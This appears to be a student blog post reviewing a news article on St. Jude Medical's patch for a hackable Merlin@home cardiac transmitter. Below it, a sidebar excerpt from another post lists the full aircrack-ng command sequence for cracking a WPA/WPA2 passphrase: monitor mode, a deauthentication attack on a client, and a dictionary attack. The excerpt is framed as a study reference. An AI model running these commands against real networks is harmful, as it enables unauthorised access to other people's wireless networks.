St. Jude Medical Patches Cardiac Machine's Cybersecurity Flaw Article Review



1.St. Jude Medical created a software patch at the U.S. FDA’s warning that their Merlin@home Transmitter that communicates with cardiac devices could be hacked
2.The transmitter wirelessly sends data on the patient with the implanted cardiac device (like a pacemaker)to a physician over their Merlin.net patient care portal
3.A hacker has the capability without this patch to modify the commands in that implanted device, administer unnecessary pacing or shocks and rapidly deplete the battery 
4.The FDA says that “the health benefits to patients from continued use of the device [Merlin@home Transmitter] outweigh the cybersecurity risks”


Summary:
I thought it was interesting to find that now the FDA is getting involved in cybersecurity issues because of the ramifications of hacking medical devices. We will definitely be seeing more of these software patches released in the following months. Hackers are generally financially motivated and wouldn’t have an interest in hacking a medical device unless, as the article says, it was like a Ransomware attack where the attacker could send a fatal amount of electricity (shock) through the patient’s body without ever touching them.

Bibliography:
Mello, John P., Jr. "St. Jude Medical Patches Cardiac Machine's Cybersecurity Flaw."St. Jude Medical Patches Cardiac Machine's Cybersecurity Flaw. Tech News World, 11 Jan. 2017. Web. 19 Jan. 2017.

Comments

Post a Comment

Popular posts from this blog

Image
Article Review 18: We Talked to the Hacker Who Took Down a Fifth of the Dark Web ·               An Anonymous hacker took down the server Freedom Hosting II which was a hosting provider for 20% of all dark web sites ·             Initially didn’t want to take down FH2 but after allegedly finding several large child pornography sites using more than FH2’s states allowance of 256MB per site decided to take it down. Ten child pornography sites had 30GB of files implying that these sites paid for hosting and the admins knew of the illegal sites. ·              It took 21 steps to take down  ·          The hacker released a dump of system files from FH2 but not user data.   The Feds have tried to identify individual users by deploying malware to grab visitors’ IP addresses because even when in control of a Tor hidden service law enforcement can’t usually see the location of each user. Summary: There are vigilante hackers taking down child pornography sites on
Read more
Reference 1 for Cracking WPA/WPA2 To recover the pass phrase from a WPA/WPA2 (TKIP) secured wireless network where the topology includes an Access Point and at least one connected client use the following commands sudo airmon-ng start wlan0 (create a monitoring interface) sudo airodump-ng mon0 (locate the wireless network and obtain information used to recover the WPA Passphrase) airodump-ng –bssid 00:1C:F0:AE:83:F8 –channel 1  (present info only for the network of interest) aireplay-ng -0 15 -a 00:1C:F0:AE:83:F8 – c 00:27:19:FF:F3:14 mon0 (launch a de-authentication attack against the connected client) airodump-ng –bssid 00:1C:F0:AE:83:F8 –channel 1 –write WPAattack mon0 (recover the passcode) aircrack-ng WPAattack -w /home/attacker/passlist.txt (tell aircrack to launch the dictionary attack with the library) Summary: Be safe. These commands allow the user to access pass phrases for the WPA/WPA2 wireless networks. Though WPA/WPA2 is significantly more
Read more